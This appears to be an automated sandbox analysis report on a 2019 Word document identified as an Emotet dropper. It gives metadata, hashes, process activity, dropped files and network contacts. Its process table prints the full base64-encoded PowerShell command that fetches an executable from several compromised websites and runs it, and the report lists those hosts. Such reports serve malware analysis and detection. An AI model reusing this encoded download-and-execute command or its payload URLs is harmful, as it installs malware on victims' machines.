Property | Value |
---|---|
File name: | BL_22565528242292101.doc |
Full analysis: | https://app.any.run/tasks/0f598bb8-0f22-440c-8132-2973b4577b8c |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | September 18, 2019, 18:34:45 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | — |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: utilize real-time, Subject: quantifying, Author: Salvador Grady, Comments: Home & Books, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 18 15:32:00 2019, Last Saved Time/Date: Wed Sep 18 15:32:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0 |
MD5: | 7E11D8B40BDDDAABDB00C81E116E3892 |
SHA1: | BEE89AB272BB6C8B93DD1A1B0D14DC3C6F4DEBAB |
SHA256: | B6E8132C9284FC40ED53BD0FD11363AB05F7A4A54EA53DFBF69D8380B0238AF1 |
SSDEEP: | 6144:Vj1qmTgpbxDj2kCUSfp40kTPLkIq7NSU4jJntATfDfBlPi7V:Vj1qmTgpbxDj2kCUSfp40k/Xq7NSU4VT |
Extension | Description |
---|---|
.doc | Microsoft Word document (54.2) |
.doc | Microsoft Word document (old ver.) (32.2) |
Property | Value |
---|---|
Title: | utilize real-time |
Subject: | quantifying |
Author: | Salvador Grady |
Keywords: | - |
Comments: | Home & Books |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:09:18 14:32:00 |
ModifyDate: | 2019:09:18 14:32:00 |
Pages: | 1 |
Words: | 95 |
Characters: | 547 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | Watsica, Price and Prosacco |
Lines: | 4 |
Paragraphs: | 1 |
CharCountWithSpaces: | 641 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: | - |
Manager: | Parker |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2884 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\BL_22565528242292101.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM | Description: Microsoft Word | Version: 14.0.6024.1000 |
3568 | powershell -encod JABQAGEAaQAxAFUAaQAxADMAPQAnAHAAQQBUAGMAUwBqAGwAJwA7ACQAdwBpAGEAWQBXAEUAIAA9ACAAJwAxADMAMwAnADsAJABqAEwAXwBLAG4AUwBaADIAPQAnAGQAYgB0AFoARAAzAHUAaQAnADsAJABHADIAdwB2AEEATwBDAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJAB3AGkAYQBZAFcARQArACcALgBlAHgAZQAnADsAJAB6ADUARQB3AE8AMgB2AD0AJwBzAHoATwBHAFAASwAnADsAJABRADgAawB6AGoAegAwAD0AJgAoACcAbgBlAHcALQBvAGIAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABuAGUAVAAuAHcAZQBCAGMAbABJAEUAbgBUADsAJABuAGIATABPAE4AZABXAFYAPQAnAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHAAYQB0AHIAaQBjAGsAZwBsAG8AYgBhAGwAdQBzAGEALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGYAUwBSAGsAQQBGAGoAcQB2AC8AQABoAHQAdABwAHMAOgAvAC8AcABpAHAAaQB6AGgAYQBuAHoAaABhAG4AZwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AMwBjAGkAbwByAG4AegBfAGkAdQBsAGEAeQBzAGMAegAtADYANwA5ADYANAA2AC8AQABoAHQAdABwAHMAOgAvAC8AdABhAG4AawBoAG8AaQAuAHYAbgAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAFgAVABTAHUAZwB6AE4AYQB6AC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBzAHUAcABlAHIAYwByAHkAcwB0AGEAbAAuAGEAbQAvAHcAcAAtAGEAZABtAGkAbgAvAFAAZABNAEkAbgBTAGcAcwAvAEAAaAB0AHQAcABzADoALwAvAGgAbwB0AGUAbAAtAGIAcgBpAHMAdABvAGwALgBsAHUALwBkAGwAcgB5AC8ATQBBAG4ASgBJAFAAbgBZAC8AJwAuACIAUwBwAGAAbABpAHQAIgAoACcAQAAnACkAOwAkAFEATgBCAEUAXwByADkAPQAnAE8ANQBaAGEAMQBDAFUAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFMANgBmADgAUgBXAFIAIABpAG4AIAAkAG4AYgBMAE8ATgBkAFcAVgApAHsAdAByAHkAewAkAFEAOABrAHoAagB6ADAALgAiAGQAYABPAFcAYABOAGwATwBBAEQAYABGAGkATABFACIAKAAkAFMANgBmADgAUgBXAFIALAAgACQARwAyAHcAdgBBAE8AQwApADsAJABwAEgATAA3AHcAaAA9ACcAUQBMAFYAVgBkAFAAOAAnADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEcAMgB3AHYAQQBPAEMAKQAuACIATABFAGAATgBHAFQASAAiACAALQBnAGUAIAAyADgAOAAwADcAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwB0AEEAYABSAFQAIgAoACQARwAyAHcAdgBBAE8AQwApADsAJABvAFMAOQBNAEcAOQAzAD0AJwBFADEAQgB1ADYAagBPAFgAJwA7AGIAcgBlAGEAawA7ACQAVABiAGYASgBhAFkAPQAnAEIAegBwAGMAXwBaAHMAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARABtAEEATwBFAE4APQAnAG0AUgBiAGIAMQBQADMAOAAnAA== | 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM | Description: Windows PowerShell | Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8CB4.tmp.cvr | — | — | — |
2884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\56F46450.wmf | wmf | 2353260EC885C3A98A6C89D22AFF1248 | E5117450EB7E41006FA9842A34889226A089FD0434E1EB70E9A3FAEE5353B13C |
2884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C75BCE9C.wmf | wmf | B419C90F42F3A4C5D5601F2F63E4E4C0 | 06874DA9DB510979C840838C515DD39001F605663AB249CB831FB165E93249E7 |
2884 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\BL_22565528242292101.doc.LNK | lnk | 9728399465562548791339FCC08301CC | 321066EBCEC458BD92AD011A401D5BBF71402341AA54CF051A02B691354F2D98 |
2884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | 776B79C938C1D8440FB4A2DA92C25EDE | 5B78C621F873B27F06A6071F22794A6DE1087345D6B4967BEBC53F928BF998FA |
2884 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | 932AF2F455D854325DD588D6555C12D8 | 987ECC620E558E07B64756E55CAFA97E072D9F634C524EDB883CA140CD993A2E |
2884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8A4B4547.wmf | wmf | 7E5DE4CFA0895E48D0C62AAD162AA2E7 | 243364152CE5B1EDEE147F71399D746441258C9629E153DCC63A2722C272D05A |
2884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4FDDA389.wmf | wmf | A6100454A4096CDA254B4F474EDFF6A8 | 4644B7D695A061E0C50351467074B3F8CB852498EE12328DD6FBF0C0709B9AED |
2884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D014DB0A.wmf | wmf | 3A29DA903BD58B73E1F0C10CA64CA98C | AE1164B8174C32D82293B27ED54BFFB64193EDC7C6E04DAF066A776E70727402 |
2884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\55CAE3F6.wmf | wmf | AD736CD196000389A578EEDCA155DAE0 | 7C36C967B8A8EA18247EF24337AB88030E6DF5F149B9404D3721D2E178878EA6 |
PID | Process | IP | Domain | ASN | Country | Reputation |
---|---|---|---|---|---|---|
3568 | powershell.exe | 148.251.180.153:443 | www.patrickglobalusa.com | Hetzner Online GmbH | DE | malicious |
3568 | powershell.exe | 213.186.33.186:443 | hotel-bristol.lu | OVH SAS | FR | suspicious |
3568 | powershell.exe | 111.67.206.122:443 | pipizhanzhang.com | China Unicom Beijing Province Network | CN | unknown |
3568 | powershell.exe | 103.221.222.16:443 | tankhoi.vn | The Corporation for Financing & Promoting Technology | VN | unknown |
3568 | powershell.exe | 104.248.24.81:443 | www.supercrystal.am | — | US | unknown |
Domain | IP | Reputation |
---|---|---|
www.patrickglobalusa.com | 148.251.180.153 | malicious |
pipizhanzhang.com | 111.67.206.122 | unknown |
tankhoi.vn | 103.221.222.16 | unknown |
www.supercrystal.am | 104.248.24.81 | unknown |
hotel-bristol.lu | 213.186.33.186 | suspicious |